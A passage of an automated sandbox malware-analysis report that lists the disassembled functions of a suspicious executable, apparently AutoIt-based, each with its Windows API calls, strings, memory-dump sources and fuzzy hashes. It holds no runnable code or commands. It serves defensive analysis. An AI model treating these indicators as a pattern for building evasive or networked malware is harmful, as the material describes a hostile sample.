                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy
                                                                    • String ID: I/i$I/i
                                                                    • API String ID: 3048848545-1481515708
                                                                    • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                    • Instruction ID: 0a652ab06750451fcc3c3dacc58035c7b25868f424554d921f39ce7e9ec73be8
                                                                    • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                    • Instruction Fuzzy Hash: B5410835900A17AACF25DFD9D4619FDB772EF48320F50504EF881A7295DB706E82C7A4
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 0063BCDA
                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0063BCF3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: eca7eafaa49fa587fc432bf992761cb28550387906e3ced97332237c3f86aea7
                                                                    • Instruction ID: 17b08716acb2dbc3f9ca8a35d615468e86a3364ed5472e893049f15340448087
                                                                    • Opcode Fuzzy Hash: eca7eafaa49fa587fc432bf992761cb28550387906e3ced97332237c3f86aea7
                                                                    • Instruction Fuzzy Hash: A45144714087469BE360AF14DC96BAFBBECFF94354F41484EF1C8810A2DB7085A88B96
                                                                    APIs
                                                                      • Part of subcall function 006244ED: __fread_nolock.LIBCMT ref: 0062450B
                                                                    • _wcscmp.LIBCMT ref: 0066C65D
                                                                    • _wcscmp.LIBCMT ref: 0066C670
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$__fread_nolock
                                                                    • String ID: FILE
                                                                    • API String ID: 4029003684-3121273764
                                                                    • Opcode ID: 91e9a537d859e56ea325b7d1624e90f598bb94b748937b37b6f807d100f19127
                                                                    • Instruction ID: 6e38fd8f9d83d182cf8fa372954a3e6df17f0c218b7c08d225489439ad3d8244
                                                                    • Opcode Fuzzy Hash: 91e9a537d859e56ea325b7d1624e90f598bb94b748937b37b6f807d100f19127
                                                                    • Instruction Fuzzy Hash: EB41D672A0061ABADF60ABA4DC81FEF77FADF49714F000069F605EB181DA709A048B65
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0068A85A
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0068A86F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 8446fceb61b4a8045cb6f7ed4bd1c998e05e13e7a3ea41deda6a8341d0e68269
                                                                    • Instruction ID: 4b866547f1ef1ac5ae4ba5e97c67e82aaa0251065eb68b2e1d2c3fe88b781e94
                                                                    • Opcode Fuzzy Hash: 8446fceb61b4a8045cb6f7ed4bd1c998e05e13e7a3ea41deda6a8341d0e68269
                                                                    • Instruction Fuzzy Hash: 9941FA78E013099FEB54DFA4D881BDA7BBAFB09300F14116AED05AB341D770A942DFA1
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 0068980E
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0068984A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: efc767be8f9f335e3797b981cb29d76f1095b32fd2dcdf51aa03dd1b9b5ab072
                                                                    • Instruction ID: 4604be4be99f5c8b9a980a959109d73583b1e3f1701a9d56c68f41aaec896ead
                                                                    • Opcode Fuzzy Hash: efc767be8f9f335e3797b981cb29d76f1095b32fd2dcdf51aa03dd1b9b5ab072
                                                                    • Instruction Fuzzy Hash: 11318F71510605AEEB10AF74CC80BFB73AAFF59764F04961DF9A9C7290CA31AC81DB64
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 006651C6
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00665201
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 0d12b19b0c2beb078282a8f4aa6027d72f720cd541ea9cc5f04a0436a2879082
                                                                    • Instruction ID: 160eae411ee6f7da9220a068e82c995c57a3b8d025d32287a27df6c9d64aa000
                                                                    • Opcode Fuzzy Hash: 0d12b19b0c2beb078282a8f4aa6027d72f720cd541ea9cc5f04a0436a2879082
                                                                    • Instruction Fuzzy Hash: C631A271A007059BEB24CF99D896BEEBBFAFF45350F14401DE987A62A0E7709B44CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __snwprintf
                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                    • API String ID: 2391506597-2584243854
                                                                    • Opcode ID: 2dda394e61db1589a1fd6ad69e23520c51465d68d20cbe6d0071f739e1247877
                                                                    • Instruction ID: 8aa5b8e4b0c5ecd79a83ea0ad7bd3def4b61b15bb87d70e54e7c405e6d55d3ce
                                                                    • Opcode Fuzzy Hash: 2dda394e61db1589a1fd6ad69e23520c51465d68d20cbe6d0071f739e1247877
                                                                    • Instruction Fuzzy Hash: C221BF71A00528ABCF50EF64D882EED77B6AF05740F40406DF405AB281DB70EA45CFAA
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0068945C
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00689467
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 94df7183ba06b7f0547760ce85ef31242e1a9f5f8ccab426edd5a059ebf4ad9c
                                                                    • Instruction ID: 2e383615132754ba9cd6e3fc1986ef3fa3f6c8fa098b5b25c81e9d3cd62dc6ec
                                                                    • Opcode Fuzzy Hash: 94df7183ba06b7f0547760ce85ef31242e1a9f5f8ccab426edd5a059ebf4ad9c
                                                                    • Instruction Fuzzy Hash: 9B1160713102097FEF21AE54DC80EFB37ABEB993A4F144229F9199B290D6719C528B70
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • GetActiveWindow.USER32 ref: 0068DA7B
                                                                    • EnumChildWindows.USER32(?,0068D75F,00000000), ref: 0068DAF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                    • String ID: T1g
                                                                    • API String ID: 3814560230-2172628023
                                                                    • Opcode ID: f0aaf8c8ae22aebb70055a7904266b44b685df742e3ab32a855b4d1a46ee5c0b
                                                                    • Instruction ID: f9511573f8b3a49d7ac8e20b2548501e04dc3127b31e3c3210c9a1f72dc90ffe
                                                                    • Opcode Fuzzy Hash: f0aaf8c8ae22aebb70055a7904266b44b685df742e3ab32a855b4d1a46ee5c0b
                                                                    • Instruction Fuzzy Hash: 19211B75205341DFCB14EF68D890AA677E7EB5A320F25171DE96A8B3E0D730A840DF60
                                                                    APIs
                                                                      • Part of subcall function 0063D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063D1BA
                                                                      • Part of subcall function 0063D17C: GetStockObject.GDI32(00000011), ref: 0063D1CE
                                                                      • Part of subcall function 0063D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063D1D8
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00689968
                                                                    • GetSysColor.USER32(00000012), ref: 00689982
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: b60e4e4d0019b5afa69840b579a3fc4fda1e451fbfbe8e16808567f8f64abd52
                                                                    • Instruction ID: 3c133c267dc7c38cd6ae8ae62c9577373fd60fc56c33950792e262bcb493b504
                                                                    • Opcode Fuzzy Hash: b60e4e4d0019b5afa69840b579a3fc4fda1e451fbfbe8e16808567f8f64abd52
                                                                    • Instruction Fuzzy Hash: 09116A72610209AFDF04EFB8CC45AFA7BA9FB09344F051619F956E3250D734E811DB60
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00689699
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006896A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: b63fe482d4205e1a3d2e82fc1f308fc98be1e19f61c9999e3b3cd4be24998877
                                                                    • Instruction ID: d9ebad7179a2e8273056360d548a2c08ad69c151896dc36238e7c204abd11eb5
                                                                    • Opcode Fuzzy Hash: b63fe482d4205e1a3d2e82fc1f308fc98be1e19f61c9999e3b3cd4be24998877
                                                                    • Instruction Fuzzy Hash: A6116A71500208ABFF116FA4DC84AFB3B6BEB05378F144314F965972E0E731AC91AB60
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 006652D5
                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006652F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: a41eb357ce614d953741dab721614f8fd903d44981185896337a2313cadf44f5
                                                                    • Instruction ID: 0790f47c816511b47b2b846c98e0dce0255124aedd1376eef2e367cfbe1e3611
                                                                    • Opcode Fuzzy Hash: a41eb357ce614d953741dab721614f8fd903d44981185896337a2313cadf44f5
                                                                    • Instruction Fuzzy Hash: DF11D375901714ABDB10DE98D946BD977AAAB06B54F040016E903BB390E3B0EE44C7D1
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00674DF5
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00674E1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: c80ef4d41a08a9c05bb558272ef18fe444630cf29a502a85a175b14e12ec4521
                                                                    • Instruction ID: b6d70815bb16abe79471af7760d00ea76975235573e63c8c1b4980db6465cfc6
                                                                    • Opcode Fuzzy Hash: c80ef4d41a08a9c05bb558272ef18fe444630cf29a502a85a175b14e12ec4521
                                                                    • Instruction Fuzzy Hash: 2A119E70501221FADB358B51888CEFBFAAAFF06764F10C22AF55956240DB70A941CAE0
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006537A7
                                                                    • ___raise_securityfailure.LIBCMT ref: 0065388E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                    • String ID: (n
                                                                    • API String ID: 3761405300-3602644056
                                                                    • Opcode ID: 434fae98f57e633eab0907c9e472edecb4e82f934a39cb9c0a52137cbe752545
                                                                    • Instruction ID: e7e05933747a0dc59ef8e8a3f0ce7b864a7bb58ea3d93dc1eb3dce04ab5fbee2
                                                                    • Opcode Fuzzy Hash: 434fae98f57e633eab0907c9e472edecb4e82f934a39cb9c0a52137cbe752545
                                                                    • Instruction Fuzzy Hash: 7F21CEB59013849AE750DF95EDDA6503BB7AB4C310F10682AE9048F3A0E3F469C4CB89
                                                                    APIs
                                                                    • inet_addr.WSOCK32(00000000), ref: 0067A84E
                                                                    • htons.WSOCK32(00000000), ref: 0067A88B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: htonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 3832099526-2422070025
                                                                    • Opcode ID: d5545d08cbb572449ba68bfa4ed0f4a3d711633387c8aa9c3c909730e20da1cf
                                                                    • Instruction ID: 57e28d68deadce697cbaaa04f07100406cbbf88b31ded9989bbb7d79a6c3309d
                                                                    • Opcode Fuzzy Hash: d5545d08cbb572449ba68bfa4ed0f4a3d711633387c8aa9c3c909730e20da1cf
                                                                    • Instruction Fuzzy Hash: A701D275200304ABCB10AFA8D886FEDB766EF85320F10C42AF51A9B3D1D771E8068B56
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0065B7EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 82061406b1c976b3705edb121b1a05a560bb6f7dd6cf1be4f28da92c6fa31126
                                                                    • Instruction ID: d037281430f062ab0155056ced63203a46002b048277521ce83ce21f30b29d04
                                                                    • Opcode Fuzzy Hash: 82061406b1c976b3705edb121b1a05a560bb6f7dd6cf1be4f28da92c6fa31126
                                                                    • Instruction Fuzzy Hash: 28012871601128ABCB44EBA4DC529FE336BBF15321F04061DF862973C1EB70580CCB94
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0065B6EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: feadaec688170cb5baad3239baa8b414fc067f596c364b9b97f6855c42b36e61
                                                                    • Instruction ID: 4a11a9c074f9de88c5ed90e177d2d3e6a19bf0171f72a155e89c6acfea5a4905
                                                                    • Opcode Fuzzy Hash: feadaec688170cb5baad3239baa8b414fc067f596c364b9b97f6855c42b36e61
                                                                    • Instruction Fuzzy Hash: 8701A271A41015ABDB44EBA4D952AFF73AA9F15341F14001DB842B72C1EB905E1C8BB9
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0065B76C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 69be2685f03a634f44ea094d551aa4f6593f002f6155167c1931590915482fd6
                                                                    • Instruction ID: 685471044cccd7a1fc907e07074fde1a2257aa61331c9065aa5c1b3a582b9816
                                                                    • Opcode Fuzzy Hash: 69be2685f03a634f44ea094d551aa4f6593f002f6155167c1931590915482fd6
                                                                    • Instruction Fuzzy Hash: 9501D671A40114BBDB40EBA4D952EFE73AE9B19341F14001DB842B32D2EBA05E0D8BB9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
